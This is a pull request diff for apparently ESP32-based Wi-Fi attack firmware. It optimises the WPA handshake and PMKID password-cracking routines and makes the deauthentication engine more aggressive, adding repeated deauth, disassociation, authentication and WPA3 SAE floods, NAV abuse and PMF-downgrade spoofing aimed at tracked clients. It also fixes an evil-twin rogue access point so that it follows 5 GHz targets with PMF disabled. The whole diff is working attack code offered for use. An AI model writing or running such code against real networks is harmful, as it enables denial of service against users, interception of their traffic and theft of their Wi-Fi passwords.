### PR TITLE
Aircrack optimizations, Deauther smart tracking, and Evil Twin fixes

### DIFF
--- a/data/admin.html
+++ b/data/admin.html
@@ -660,6 +660,7 @@
             </div>
         </div>
 
+        <!-- LIVE PACKET ANALYZER -->
         <div id="view-sniffer" class="view-container">
             <h2 data-i18n="live_packet_analyzer">Live Packet Analyzer</h2>
             
@@ -742,6 +743,7 @@
             </div>
         </div>
 
+        <!-- WIFI SCANNER -->
         <div id="view-scan" class="view-container">
             <h2 data-i18n="wifi_scanner_title">WiFi Scanner</h2>
             <div class="card">
@@ -759,19 +761,20 @@
                             <th data-i18n="th_ch">CH</th>
                             <th data-i18n="th_bssid">BSSID</th>
                             <th data-i18n="th_sec">Sec</th>
+                            <th data-i18n="th_wps">WPS</th>
                             <th data-i18n="th_action">Action</th>
                         </tr>
                     </thead>
                     <tbody id="wifi-networks-body">
                         <tr>
-                            <td colspan="6" style="text-align:center; padding: 20px;" data-i18n="no_scan_data">No scan data</td>
+                            <td colspan="7" style="text-align:center; padding: 20px;" data-i18n="no_scan_data">No scan data</td>
                         </tr>
                     </tbody>
                 </table>
             </div>
         </div>
 
-        
+        <!-- RECONNAISSANCE -->
         <div id="view-recon" class="view-container">
             <div style="display:flex; justify-content:space-between; align-items:center; border-bottom:1px solid #333; padding-bottom:15px; margin-bottom:20px;">
                 <h2 style="border:none; margin:0;" data-i18n="recon_title">Network Reconnaissance</h2>
@@ -796,7 +799,7 @@
                         </tr>
                     </thead>
                     <tbody id="recon-ap-body">
-                        <tr><td colspan="9" style="text-align:center; padding:15px; color:#666;">Press START RECON to listen...</td></tr>
+                        <tr><td colspan="9" style="text-align:center; padding:15px; color:#666;">Start an attack or scan to listen...</td></tr>
                     </tbody>
                 </table>
             </div>
@@ -817,7 +820,7 @@
                         </tr>
                     </thead>
                     <tbody id="recon-cli-body">
-                        <tr><td colspan="5" style="text-align:center; padding:15px; color:#666;">Waiting for clients...</td></tr>
+                        <tr><td colspan="6" style="text-align:center; padding:15px; color:#666;">Waiting for clients...</td></tr>
                     </tbody>
                 </table>
             </div>
@@ -1657,11 +1660,13 @@
                     const safeSsid = net.ssid.replace(/'/g, "\\'");
                     
                     tr.innerHTML = `
-                        <td style="font-weight:bold; color:white;">${net.ssid}</td>
+                        <td style="font-weight:bold; color:white;"> ${ (net.ssid && net.ssid.trim()) !== "" ? net.ssid : `<span style="color:#666">&lt;hidden&gt;</span>`}</td>
                         <td>${net.signal}</td>
                         <td>${net.channel}</td>
                         <td style="font-family:monospace; font-size:0.85rem;">${net.bssid}</td>
-                        <td>${net.authmode}</td> <td>
+                        <td>${net.authmode}</td> 
+                        <td>${net.wps ? 'Yes' : 'No'}</td>
+                        <td>
                             <button style="margin:0; padding:6px 10px; font-size:0.7rem;" 
                                 onclick="selectTarget('${safeSsid}', '${net.bssid}', ${net.channel}, ${net.signal}, ${net.authmode_code})">
                                 TARGET

--- a/include/aircrack.h
+++ b/include/aircrack.h
@@ -4,6 +4,8 @@
 #include <esp_system.h>
 
 
+int calculate_pmk(const char *passphrase, const char *ssid, size_t ssid_len, uint8_t *pmk);
+
 bool verify_password(const char *passphrase, const char *ssid, size_t ssid_len,
                      const uint8_t *mac_ap, const uint8_t *mac_sta,
                      const uint8_t *anonce, const uint8_t *snonce,

--- a/include/wifiMng.h
+++ b/include/wifiMng.h
@@ -4,6 +4,20 @@
 #include <esp_err.h>
 #include <esp_wifi.h>
 
+/**
+ * @brief Client ack tracking for unicast frames, 
+ * used to avoid counting unicast frames as dropped when they
+ * fail to send (since many APs will reject them)
+ */
+typedef struct {
+    uint8_t mac[6];
+    int64_t last_ack_time_us;
+    uint32_t fail_count;
+} client_ack_tracker_t;
+
+
+extern esp_err_t esp_wifi_internal_set_retry_counter(uint8_t short_retry, uint8_t long_retry);
+
 
 /**
  * @brief Init Wifi interface
@@ -45,6 +59,14 @@ esp_err_t wifi_set_temporary_channel(uint8_t new_channel, uint32_t window);
 
 
 /**
+ * @brief Change SoftAP channel using CSA (Channel Switch Announcement)
+ * * @param new_channel Il nuovo canale desiderato (1-13)
+ * @return esp_err_t 
+ */
+esp_err_t wifi_switch_ap_channel_csa(uint8_t new_channel);
+
+
+/**
  * @brief Get sent frames
  */
 uint32_t wifi_get_sent_frames(void);
@@ -78,5 +100,13 @@ void wifi_reset_frame_counters(void);
  * @brief Get current frames per second (PPS)
  */
 uint32_t wifi_get_frame_pps(void);
+
+
+/**
+ * @brief Check if a client is responsive based on ACK tracking
+ * This is used to avoid counting unicast frames as dropped when the client is not responding.
+ */
+bool wifi_mng_is_client_responsive(const uint8_t *mac);
+
 
 #endif

--- a/platformio.ini
+++ b/platformio.ini
@@ -21,7 +21,7 @@ check_flags = --enable=all
 extra_scripts = 
 	post:scripts/merge_bins.py
 build_flags =
-  -D APP_VERSION=\"1.3.0\"
+  -D APP_VERSION=\"1.5.1\"
 
 [env:esp32]
 board = esp32dev

--- a/src/aircrack.c
+++ b/src/aircrack.c
@@ -1,13 +1,9 @@
 #include <mbedtls/md.h>
-#include <mbedtls/aes.h>
-#include <mbedtls/sha1.h>
-#include <mbedtls/cmac.h>
 #include <mbedtls/pkcs5.h>
 #include <string.h>
 #include <stdio.h>
 #include "esp_log.h"
 #include "aircrack.h"
-
 
 #define PMKID_LEN 16
 #define WPA_PASSPHRASE_MAX_LEN 64
@@ -19,28 +15,36 @@
 static const char *TAG = "AIRCRACK";
 
 
-/* Static declarations */
-static void calculate_pmk(const char *passphrase, const char *ssid, size_t ssid_len, uint8_t *pmk);
-static void calculate_ptk(const uint8_t *pmk, const uint8_t *mac_ap, const uint8_t *mac_sta,
-                          const uint8_t *anonce, const uint8_t *snonce, 
-                          uint8_t *ptk, int algorithm) ;
-static void calculate_mic(const uint8_t *ptk, const uint8_t *eapol, size_t eapol_len, uint8_t *mic, uint8_t key_descriptor);
-static void calculate_pmkid(const uint8_t *pmk, const uint8_t *mac_ap, const uint8_t *mac_sta, uint8_t *pmkid);
+/* * OTTIMIZZAZIONE FLASH:
+ * Importiamo le funzioni primitive già compilate in libwpa_supplicant.a per il Wi-Fi.
+ * Evitiamo di includere il layer di astrazione generico di MbedTLS, risparmiando KB di flash.
+ */
+extern void hmac_md5(const uint8_t *key, size_t key_len, const uint8_t *data, size_t data_len, uint8_t *mac);
+extern void hmac_sha1(const uint8_t *key, size_t key_len, const uint8_t *data, size_t data_len, uint8_t *mac);
+extern void sha1_prf(const uint8_t *key, size_t key_len, const char *label, const uint8_t *data, size_t data_len, uint8_t *buf, size_t buf_len);
+extern void sha256_prf(const uint8_t *key, size_t key_len, const char *label, const uint8_t *data, size_t data_len, uint8_t *buf, size_t buf_len);
+extern int omac1_aes_128(const uint8_t *key, const uint8_t *data, size_t data_len, uint8_t *mac);
 
 
-static void calculate_pmk(const char *passphrase, const char *ssid, size_t ssid_len, uint8_t *pmk) 
+int calculate_pmk(const char *passphrase, const char *ssid, size_t ssid_len, uint8_t *pmk) 
 {
-    mbedtls_pkcs5_pbkdf2_hmac_ext(MBEDTLS_MD_SHA1, (const unsigned char *)passphrase, strlen(passphrase), (const unsigned char *)ssid, ssid_len, 4096, 32, pmk);
+    int ret = 0;
+    ret = mbedtls_pkcs5_pbkdf2_hmac_ext(MBEDTLS_MD_SHA1, (const unsigned char *)passphrase, strlen(passphrase), (const unsigned char *)ssid, ssid_len, 4096, 32, pmk);
+    if (ret != 0) {
+        ESP_LOGE("CRYPTO", "PBKDF2 failed: -0x%04X", -ret);
+        return ret;
+    }
+    return 0;
 }
 
 static void calculate_ptk(const uint8_t *pmk, const uint8_t *mac_ap, const uint8_t *mac_sta,
                           const uint8_t *anonce, const uint8_t *snonce, 
                           uint8_t *ptk, int algorithm) 
 {
-    const char *label = "Pairwise key expansion";
-    uint8_t data[76] = { 0 };
-    uint8_t input[128] = { 0 };
-    size_t label_len = strlen(label);
+    /* * OTTIMIZZAZIONE RAM: Abbiamo rimosso input[128].
+     * Il PRF del supplicant fa l'assemblaggio internamente. Risparmiamo ~130 byte di Stack RAM.
+     */
+    uint8_t data[76];
 
     // Min(MAC_AP, MAC_STA) || Max(MAC_AP, MAC_STA)
     if (memcmp(mac_ap, mac_sta, 6) < 0) {
@@ -55,100 +59,41 @@ static void calculate_ptk(const uint8_t *pmk, const uint8_t *mac_ap, const uint8
     } else {
         memcpy(data + 12, snonce, 32); memcpy(data + 44, anonce, 32);
     }
-
-    uint8_t counter = 0;
-    size_t bytes_generated = 0;
     
-    // Setup mbedTLS in base all'algoritmo
-    mbedtls_md_type_t md_type = (algorithm == PTK_ALG_SHA256) ? MBEDTLS_MD_SHA256 : MBEDTLS_MD_SHA1;
-    const mbedtls_md_info_t *info = mbedtls_md_info_from_type(md_type);
-    size_t hash_len = mbedtls_md_get_size(info); // 20 per SHA1, 32 per SHA256
-    uint8_t temp[32]; // Max size (SHA256)
-
-    while (bytes_generated < WPA_PTK_LEN) {
-        // Label + 0x00 + Data + Counter
-        memcpy(input, label, label_len);
-        input[label_len] = 0x00;
-        memcpy(input + label_len + 1, data, sizeof(data));
-        input[label_len + 1 + sizeof(data)] = counter;
-
-        size_t input_len = label_len + 1 + sizeof(data) + 1;
-
-        mbedtls_md_context_t ctx;
-        mbedtls_md_init(&ctx);
-        mbedtls_md_setup(&ctx, info, 1);
-        mbedtls_md_hmac_starts(&ctx, pmk, 32);
-        mbedtls_md_hmac_update(&ctx, input, input_len);
-        mbedtls_md_hmac_finish(&ctx, temp);
-        mbedtls_md_free(&ctx);
-
-        size_t bytes_to_copy = (WPA_PTK_LEN - bytes_generated > hash_len) ? hash_len : WPA_PTK_LEN - bytes_generated;
-        memcpy(ptk + bytes_generated, temp, bytes_to_copy);
-        bytes_generated += bytes_to_copy;
-        counter++;
+    // Generazione PTK usando le Pseudorandom Functions native del firmware
+    if (algorithm == PTK_ALG_SHA256) {
+        sha256_prf(pmk, 32, "Pairwise key expansion", data, sizeof(data), ptk, WPA_PTK_LEN);
+    } else {
+        sha1_prf(pmk, 32, "Pairwise key expansion", data, sizeof(data), ptk, WPA_PTK_LEN);
     }
 }
 
 static void calculate_mic(const uint8_t *ptk, const uint8_t *eapol, size_t eapol_len, uint8_t *mic, uint8_t key_descriptor) 
 {
-    /* TKIP: HMAC‑MD5 */
+    /* * OTTIMIZZAZIONE RAM: Abbiamo rimosso mbedtls_cipher_context e mbedtls_md_context.
+     * Risparmiamo altri ~150 byte di Stack RAM e snelliamo brutalmente l'esecuzione.
+     */
     if (key_descriptor == 1) {
-        mbedtls_md_context_t ctx;
-        const mbedtls_md_info_t *info = mbedtls_md_info_from_type(MBEDTLS_MD_MD5);
-        mbedtls_md_init(&ctx);
-        mbedtls_md_setup(&ctx, info, 1);
-        mbedtls_md_hmac_starts(&ctx, ptk, 16);
-        mbedtls_md_hmac_update(&ctx, eapol, eapol_len);
-        mbedtls_md_hmac_finish(&ctx, mic);
-        mbedtls_md_free(&ctx);
-    }
-    /* CCMP: HMAC‑SHA1 */
-    else if (key_descriptor == 2) {
-        uint8_t sha1[20];
-        mbedtls_md_context_t ctx;
-        const mbedtls_md_info_t *info = mbedtls_md_info_from_type(MBEDTLS_MD_SHA1);
-        mbedtls_md_init(&ctx);
-        mbedtls_md_setup(&ctx, info, 1);
-        mbedtls_md_hmac_starts(&ctx, ptk, 16);
-        mbedtls_md_hmac_update(&ctx, eapol, eapol_len);
-        mbedtls_md_hmac_finish(&ctx, sha1);
-        mbedtls_md_free(&ctx);
-        memcpy(mic, sha1, 16);
+        hmac_md5(ptk, 16, eapol, eapol_len, mic);
     } 
-    /* CCMP+PMF: AES‑CMAC */
+    else if (key_descriptor == 2) {
+        hmac_sha1(ptk, 16, eapol, eapol_len, mic);
+    } 
     else if (key_descriptor == 3) {
-        uint8_t cmac[16];
-        mbedtls_cipher_context_t ctx;
-        const mbedtls_cipher_info_t *info = mbedtls_cipher_info_from_type(MBEDTLS_CIPHER_AES_128_ECB);
-        mbedtls_cipher_init(&ctx);
-        mbedtls_cipher_setup(&ctx, info);
-        mbedtls_cipher_cmac_starts(&ctx, ptk, 128);
-        mbedtls_cipher_cmac_update(&ctx, eapol, eapol_len);
-        mbedtls_cipher_cmac_finish(&ctx, cmac);
-        mbedtls_cipher_free(&ctx);
-        memcpy(mic, cmac, 16);
+        omac1_aes_128(ptk, eapol, eapol_len, mic);
     }
 }
 
-
 static void calculate_pmkid(const uint8_t *pmk, const uint8_t *mac_ap, const uint8_t *mac_sta, uint8_t *pmkid) 
 {
-    const char *pmk_name = "PMK Name";  // Etichetta utilizzata per generare PMKID
-    uint8_t data[20] = { 0 };  // Lunghezza: 8 ("PMK Name") + 6 (MAC AP) + 6 (MAC STA)
-    memcpy(data, pmk_name, 8);
+    uint8_t data[20];
+    memcpy(data, "PMK Name", 8);
     memcpy(data + 8, mac_ap, 6);
     memcpy(data + 14, mac_sta, 6);
 
-    mbedtls_md_context_t ctx;
-    const mbedtls_md_info_t *info = mbedtls_md_info_from_type(MBEDTLS_MD_SHA1);
-
-    mbedtls_md_init(&ctx);
-    mbedtls_md_setup(&ctx, info, 1);
-    mbedtls_md_hmac_starts(&ctx, pmk, 32);  // PMK come chiave HMAC
-    mbedtls_md_hmac_update(&ctx, data, sizeof(data));
-    mbedtls_md_hmac_finish(&ctx, pmkid);  // Il risultato è il PMKID (primi 16 byte)
-
-    mbedtls_md_free(&ctx);
+    uint8_t hash[20];
+    hmac_sha1(pmk, 32, data, sizeof(data), hash);
+    memcpy(pmkid, hash, PMKID_LEN);
 }
 
 
@@ -158,42 +103,41 @@ bool verify_password(const char *passphrase, const char *ssid, size_t ssid_len,
                      const uint8_t *eapol, size_t eapol_len,
                      const uint8_t *expected_mic, uint8_t key_descriptor) 
 {
-    uint8_t pmk[32] = { 0 }; /* Master key */
-    uint8_t ptk[WPA_PTK_LEN] = { 0 }; /* Transient key */
+    int error;
+    uint8_t pmk[32] = { 0 }; 
+    uint8_t ptk[WPA_PTK_LEN] = { 0 }; 
     uint8_t calculated_mic[16] = { 0 };
 
-    /* 1. PMK Calculation */
-    calculate_pmk(passphrase, ssid, ssid_len, pmk);
+    error = calculate_pmk(passphrase, ssid, ssid_len, pmk);
+    if (error != 0) {
+        return false;
+    }
 
-    /* 2. PTK Calculation (SHA1 or SHA256) */
     int ptk_alg = (key_descriptor == 3) ? PTK_ALG_SHA256 : PTK_ALG_SHA1;
     calculate_ptk(pmk, mac_ap, mac_sta, anonce, snonce, ptk, ptk_alg);
 
-    /* 3. MIC Calculation */
     calculate_mic(ptk, eapol, eapol_len, calculated_mic, key_descriptor);
     
     bool ret = memcmp(calculated_mic, expected_mic, 16) == 0;
-    if(ret == true)
-    {
-        ESP_LOGI(TAG, "Password \"%s\" verified with handshake!.", passphrase);
+    if(ret == true) {
+        ESP_LOGI(TAG, "Password \"%s\" verified with handshake!", passphrase);
     }
     return ret;
 }
 
-
 bool verify_pmkid(const char *passphrase, const char *ssid, size_t ssid_len,
                   const uint8_t *mac_ap, const uint8_t *mac_sta,
-                  const uint8_t *expected_pmkid) {
-    uint8_t pmk[32] = { 0 };    // PMK è lungo 32 byte
-    uint8_t pmkid[20] = { 0 };  // PMKID è lungo 16 byte
+                  const uint8_t *expected_pmkid) 
+{
+    uint8_t pmk[32] = { 0 };  
+    uint8_t pmkid[20] = { 0 };  
 
     calculate_pmk(passphrase, ssid, ssid_len, pmk);
     calculate_pmkid(pmk, mac_ap, mac_sta, pmkid);
 
     bool ret = memcmp(pmkid, expected_pmkid, PMKID_LEN) == 0;
-    if(ret == true)
-    {
-        ESP_LOGI(TAG, "Password \"%s\" verified with PMKID!.", passphrase);
+    if(ret == true) {
+        ESP_LOGI(TAG, "Password \"%s\" verified with PMKID!", passphrase);
     }
     return ret;
 }

--- a/src/deauther.c
+++ b/src/deauther.c
@@ -19,6 +19,7 @@
 #define SOFTAP_REST_TIME     280   // Home channel time
 #define SINGLE_TARGET_ROOM   80
 #define SCAN_INTERVAL_US     30000000 // 30 seconds
+#define CLIENT_RSSI_THRESHOLD -90
 
 static const char *TAG = "DEAUTHER";
 static TaskHandle_t deauther_task_handle = NULL;
@@ -57,9 +58,6 @@ static uint8_t get_csa_switch_channel(uint8_t current_channel) {
  */
 static void execute_attack_on_target(const uint8_t *ap_bssid, const char *ap_ssid, uint8_t ap_channel)
 {
-    wifi_sniffer_get_clients(&clients);
-    bool clients_targeted = false;
-
     switch (current_attack_type) 
     {
         // --- ATTACCHI IBRIDI (Client Specifici -> Fallback Broadcast) ---
@@ -67,13 +65,15 @@ static void execute_attack_on_target(const uint8_t *ap_bssid, const char *ap_ssi
         {
             if (clients.count > 0) {
                 for (int c = 0; c < clients.count; c++) {
-                    if (memcmp(clients.client[c].bssid, ap_bssid, 6) == 0) {
+                    if (memcmp(clients.client[c].bssid, ap_bssid, 6) == 0 && clients.client[c].rssi >= CLIENT_RSSI_THRESHOLD) {
+                        if (!wifi_mng_is_client_responsive(clients.client[c].mac)) {
+                            continue; 
+                        }
                         wifi_attack_deauth_basic(clients.client[c].mac, ap_bssid, reason_code);
-                        clients_targeted = true;
                     }
                 }
             }
-            if (!clients_targeted) {
+            for(int i = 0; i < 15; i++) {
                 wifi_attack_deauth_basic(NULL, ap_bssid, reason_code);
             }
             break;
@@ -83,13 +83,15 @@ static void execute_attack_on_target(const uint8_t *ap_bssid, const char *ap_ssi
         {
             if (clients.count > 0) {
                 for (int c = 0; c < clients.count; c++) {
-                    if (memcmp(clients.client[c].bssid, ap_bssid, 6) == 0) {
+                    if (memcmp(clients.client[c].bssid, ap_bssid, 6) == 0 && clients.client[c].rssi >= CLIENT_RSSI_THRESHOLD) {
+                        if (!wifi_mng_is_client_responsive(clients.client[c].mac)) {
+                            continue; 
+                        }
                         wifi_attack_send_disassoc(ap_bssid, clients.client[c].mac, reason_code);
-                        clients_targeted = true;
                     }
                 }
             }
-            if (!clients_targeted) {
+            for(int i = 0; i < 15; i++) {
                 wifi_attack_send_disassoc(ap_bssid, broadcast_mac, reason_code);
             }
             break;
@@ -99,14 +101,16 @@ static void execute_attack_on_target(const uint8_t *ap_bssid, const char *ap_ssi
         {
             if (clients.count > 0) {
                 for (int c = 0; c < clients.count; c++) {
-                    if (memcmp(clients.client[c].bssid, ap_bssid, 6) == 0) {
+                    if (memcmp(clients.client[c].bssid, ap_bssid, 6) == 0 && clients.client[c].rssi >= CLIENT_RSSI_THRESHOLD) {
+                        if (!wifi_mng_is_client_responsive(clients.client[c].mac)) {
+                            continue; 
+                        }
                         wifi_attack_deauth_basic(clients.client[c].mac, ap_bssid, reason_code);
                         wifi_attack_send_disassoc(ap_bssid, clients.client[c].mac, reason_code);
-                        clients_targeted = true;
                     }
                 }
             }
-            if (!clients_targeted) {
+            for(int i = 0; i < 15; i++) {
                 wifi_attack_deauth_basic(NULL, ap_bssid, reason_code);
                 wifi_attack_send_disassoc(ap_bssid, broadcast_mac, reason_code);
             }
@@ -116,14 +120,18 @@ static void execute_attack_on_target(const uint8_t *ap_bssid, const char *ap_ssi
         // --- ATTACCHI BASATI SULL'AP ---
         case DEAUTHER_ATTACK_AUTH_FLOOD:
         {
-            wifi_attack_send_auth_frame(ap_bssid, random_mac);
+            for(int i = 0; i < 15; i++) {
+                wifi_attack_send_auth_frame(ap_bssid, random_mac);
+            }
             break;
         }
 
         case DEAUTHER_ATTACK_ASSOC_FLOOD:
         {
-            wifi_attack_send_auth_frame(ap_bssid, random_mac);
-            wifi_attack_send_assoc_req(ap_bssid, random_mac);
+            for(int i = 0; i < 15; i++) {
+                wifi_attack_send_auth_frame(ap_bssid, random_mac);
+                wifi_attack_send_assoc_req(ap_bssid, random_mac);
+            }
             break;
         }
 
@@ -137,20 +145,26 @@ static void execute_attack_on_target(const uint8_t *ap_bssid, const char *ap_ssi
         case DEAUTHER_ATTACK_BEACON_SPAM:
         {
             if (ap_ssid != NULL && strlen(ap_ssid) > 0) {
-                wifi_attack_deauth_client_negative_tx_power(ap_bssid, ap_channel, ap_ssid);
+                for(int i = 0; i < 20; i++) {
+                    wifi_attack_deauth_client_negative_tx_power(ap_bssid, ap_channel, ap_ssid);
+                }
             }
             break;
         }
 
         case DEAUTHER_ATTACK_WPA3_SAE_FLOOD:
         {
-            wifi_attack_wpa3_sae_flood(ap_bssid);
+            for(int i = 0; i < 20; i++) {
+                wifi_attack_wpa3_sae_flood(ap_bssid);
+            }
             break;
         }
 
         case DEAUTHER_ATTACK_NAV_ABUSE:
         {
-            wifi_attack_nav_abuse_qos_data_broadcast(ap_bssid);
+            for(int i = 0; i < 20; i++) {
+                wifi_attack_nav_abuse_qos_data_broadcast(ap_bssid);
+            }
             break;
         }
 
@@ -165,8 +179,12 @@ static void execute_attack_on_target(const uint8_t *ap_bssid, const char *ap_ssi
             {
                 for (uint8_t c = 0; c < clients.count; c++) 
                 {
-                    if (memcmp(clients.client[c].bssid, ap_bssid, 6) == 0) 
+                    if (memcmp(clients.client[c].bssid, ap_bssid, 6) == 0 && clients.client[c].rssi >= CLIENT_RSSI_THRESHOLD) 
                     {
+                        if (!wifi_mng_is_client_responsive(clients.client[c].mac)) {
+                            continue; 
+                        }
+
                         if (current_attack_type == DEAUTHER_ATTACK_EAPOL_LOGOFF)
                             wifi_attack_deauth_ap_eapol_logoff(clients.client[c].mac, ap_bssid);
                         
@@ -191,11 +209,16 @@ static void execute_attack_on_target(const uint8_t *ap_bssid, const char *ap_ssi
         {
             if (clients.count > 0) {
                 for (int c = 0; c < clients.count; c++) {
-                    if (memcmp(clients.client[c].bssid, ap_bssid, 6) == 0) {
-                        // Inviamo Disassoc (per staccarlo) seguito da Assoc Req legacy
-                        wifi_attack_send_disassoc(ap_bssid, clients.client[c].mac, reason_code);
-                        // Spoofiamo il client che chiede di connettersi senza PMF
-                        wifi_attack_send_assoc_req(ap_bssid, clients.client[c].mac);
+                    if (memcmp(clients.client[c].bssid, ap_bssid, 6) == 0 && clients.client[c].rssi >= CLIENT_RSSI_THRESHOLD) {
+                        if (!wifi_mng_is_client_responsive(clients.client[c].mac)) {
+                            continue; 
+                        }
+                        for(int i = 0; i < 15; i++) {
+                            // Inviamo Disassoc (per staccarlo) seguito da Assoc Req legacy
+                            wifi_attack_send_disassoc(ap_bssid, clients.client[c].mac, reason_code);
+                            // Spoofiamo il client che chiede di connettersi senza PMF
+                            wifi_attack_send_assoc_req(ap_bssid, clients.client[c].mac);
+                        }
                     }
                 }
             }
@@ -276,23 +299,28 @@ static void deauther_send_frames(const target_info_t *target)
     // --- MODALITÀ SINGLE TARGET ---
     else 
     {
+        /* Force ROC Requesto to prevents reception of ACK when sending UNICAST frames */
         wifi_set_temporary_channel(target->channel, ATTACK_WINDOW);
         vTaskDelay(pdMS_TO_TICKS(CHANNEL_SWITCH_DELAY));
-        int64_t start_time = esp_timer_get_time();
-        while(true) {
-            /* Burst */
-            for(int k=0; k<5; k++) {
-                execute_attack_on_target(target->bssid, (const char*)target->ssid, target->channel);
-            }
-            vTaskDelay(pdMS_TO_TICKS(10)); 
-            if ((esp_timer_get_time() - start_time) / 1000 > (ATTACK_WINDOW - 20)) break;
-        }
-        int64_t elapsed = (esp_timer_get_time() - start_time) / 1000;
-        if (elapsed < (ATTACK_WINDOW - CHANNEL_SWITCH_DELAY)) {
-            vTaskDelay(pdMS_TO_TICKS((ATTACK_WINDOW - CHANNEL_SWITCH_DELAY) - elapsed));
-        }
+        execute_attack_on_target(target->bssid, (const char*)target->ssid, target->channel);
+        //wifi_set_temporary_channel(target->channel, ATTACK_WINDOW);
+        //vTaskDelay(pdMS_TO_TICKS(CHANNEL_SWITCH_DELAY));
+        //int64_t start_time = esp_timer_get_time();
+        //while(true) {
+        //    /* Burst */
+        //    for(int k=0; k<5; k++) {
+        //        execute_attack_on_target(target->bssid, (const char*)target->ssid, target->channel);
+        //        vTaskDelay(pdMS_TO_TICKS(1)); 
+        //    }
+        //    vTaskDelay(pdMS_TO_TICKS(10)); 
+        //    //if ((esp_timer_get_time() - start_time) / 1000 > (ATTACK_WINDOW - 20)) break;
+        //}
+        //int64_t elapsed = (esp_timer_get_time() - start_time) / 1000;
+        //if (elapsed < (ATTACK_WINDOW - CHANNEL_SWITCH_DELAY)) {
+        //    vTaskDelay(pdMS_TO_TICKS((ATTACK_WINDOW - CHANNEL_SWITCH_DELAY) - elapsed));
+        //}
         /* Wait some time to permit the AP to communicate on his own channel */
-        vTaskDelay(pdMS_TO_TICKS(SOFTAP_REST_TIME + SINGLE_TARGET_ROOM));
+        //vTaskDelay(pdMS_TO_TICKS(SOFTAP_REST_TIME + SINGLE_TARGET_ROOM));
     }
 }
 
@@ -311,12 +339,13 @@ static void deauther_task(void *pvParameters)
     wifi_sniffer_stop_channel_hopping();
 
     /* First scan to fill APs list */
-    wifi_sniffer_scan_fill_aps();
+    wifi_sniffer_scan_fill_aps_fast();
 
     int64_t last_scan_time = esp_timer_get_time();
 
     while(deauther_running)
     {
+        wifi_sniffer_get_clients(&clients);
         deauther_send_frames(target);
         vTaskDelay(pdMS_TO_TICKS(SOFTAP_REST_TIME));
 
@@ -356,6 +385,13 @@ void deauther_start(const target_info_t *deauth_target, deauther_attack_type_t a
     current_attack_type = attack_type;
     deauther_running = true;
     target_set(deauth_target, TARGET_INFO_DEAUTHER);
+
+    /* Switch channel */
+    bool broadcast_target = isMacBroadcast(deauth_target->bssid);
+    if(!broadcast_target) {
+        wifi_switch_ap_channel_csa(deauth_target->channel);
+    }
+
     xTaskCreate(deauther_task, "deauther_task", 4096, NULL, DEAUTHER_TASK_PRIO, &deauther_task_handle);
     ESP_LOGI(TAG, "Deauth Attack Started.");
 }

--- a/src/evil_twin.c
+++ b/src/evil_twin.c
@@ -20,6 +20,8 @@
 static const char *TAG = "EVIL_TWIN";
 static TaskHandle_t evil_twin_task_handle = NULL;
 static volatile bool evil_twin_running = false;
+static EventGroupHandle_t evil_twin_evt = NULL;
+#define EVILTWIN_EXIT_BIT (1 << 0)
 
 /* Evil Twin Attack Status Strings */
 static const char* evil_twin_attack_status_string[EVIL_TWIN_ATTACK_STATUS_MAX] = {
@@ -57,7 +59,7 @@ static void evil_twin_task(void *pvParameters)
             .pmf_cfg = {
                     /* Cannot set pmf to required when in wpa-wpa2 mixed mode! Setting pmf to optional mode. */
                     .required = false, 
-                    .capable = true
+                    .capable = false
             }
         },
     };
@@ -145,7 +147,7 @@ static void evil_twin_task(void *pvParameters)
         /* Periodic scan for target tracking */
         if (esp_timer_get_time() - last_scan_time > SCAN_INTERVAL_US) 
         {
-            if(wifi_sniffer_scan_fill_aps() == ESP_OK) {
+            if(wifi_sniffer_scan_fill_aps_fast() == ESP_OK) {
                 if(wifi_sniffer_get_aps(&aps) == ESP_OK) {
                     bool found_2g_now = false;
                     for(uint8_t i = 0; i < aps.count; i++) {
@@ -165,13 +167,22 @@ static void evil_twin_task(void *pvParameters)
                             else {
                                 if (!evil_twin_status.has_5ghz_target) {
                                     evil_twin_status.has_5ghz_target = true;
+                                    twin_on_5ghz.attack_scheme = target->attack_scheme;
+                                    twin_on_5ghz.authmode = aps.ap[i].record.authmode;
+                                    twin_on_5ghz.channel = aps.ap[i].record.primary;
+                                    twin_on_5ghz.group_cipher = aps.ap[i].record.group_cipher;
+                                    twin_on_5ghz.pairwise_cipher = aps.ap[i].record.pairwise_cipher;
+                                    twin_on_5ghz.rssi = aps.ap[i].record.rssi;
+                                    twin_on_5ghz.vendor = target->vendor;
+                                    memcpy(twin_on_5ghz.bssid, aps.ap[i].record.bssid, 6);
+                                    memcpy(twin_on_5ghz.ssid, aps.ap[i].record.ssid, sizeof(aps.ap[i].record.ssid));
+                                    target_set(&twin_on_5ghz, TARGET_INFO_EVIL_TWIN_5G);
                                     ESP_LOGI(TAG, "New 5GHz target found on Ch %d", aps.ap[i].record.primary);
                                 }
                                 if (twin_on_5ghz.channel != aps.ap[i].record.primary) {
                                     ESP_LOGW(TAG, "TARGET 5GHz SWITCHED CHANNEL: %d -> %d", twin_on_5ghz.channel, aps.ap[i].record.primary);
                                     ws_log(TAG, "Target 5GHz moved to Ch %d", aps.ap[i].record.primary);
                                     twin_on_5ghz.channel = aps.ap[i].record.primary;
-                                    memcpy(twin_on_5ghz.bssid, aps.ap[i].record.bssid, 6);
                                 }
                             }
                         }
@@ -182,6 +193,9 @@ static void evil_twin_task(void *pvParameters)
             last_scan_time = esp_timer_get_time();
         }
         vTaskDelay(pdMS_TO_TICKS(SOFTAP_REST_TIME)); 
+    }
+    if(evil_twin_evt != NULL) {
+        xEventGroupSetBits(evil_twin_evt, EVILTWIN_EXIT_BIT);
     }
     vTaskDelete(NULL);
 }
@@ -194,6 +208,11 @@ void evil_twin_start_attack(const target_info_t *targe_info)
         ESP_LOGE(TAG, "EvilTwin task already started.");
         return;
     }
+
+    if (evil_twin_evt == NULL) {
+        evil_twin_evt = xEventGroupCreate();
+    }
+    xEventGroupClearBits(evil_twin_evt, EVILTWIN_EXIT_BIT);
 
     /* Reset status information */
     memset(&evil_twin_status, 0, sizeof(evil_twin_attack_status_info_t));
@@ -221,7 +240,13 @@ void evil_twin_stop_attack(void)
 
     /* Signal task to stop and wait */
     evil_twin_running = false;
-    vTaskDelay(pdMS_TO_TICKS(2000));
+
+    if (evil_twin_evt != NULL) {
+        xEventGroupWaitBits(evil_twin_evt, EVILTWIN_EXIT_BIT, pdTRUE, pdFALSE, portMAX_DELAY);
+        vEventGroupDelete(evil_twin_evt);
+        evil_twin_evt = NULL;
+    }
+
     evil_twin_task_handle = NULL;
 
     /* Stop DNS Server */

--- a/src/server_api.c
+++ b/src/server_api.c
@@ -425,49 +425,29 @@ static esp_err_t api_admin_set_ap_settings(ws_frame_req_t *req)
 
 static esp_err_t api_wifi_scan(ws_frame_req_t *req)
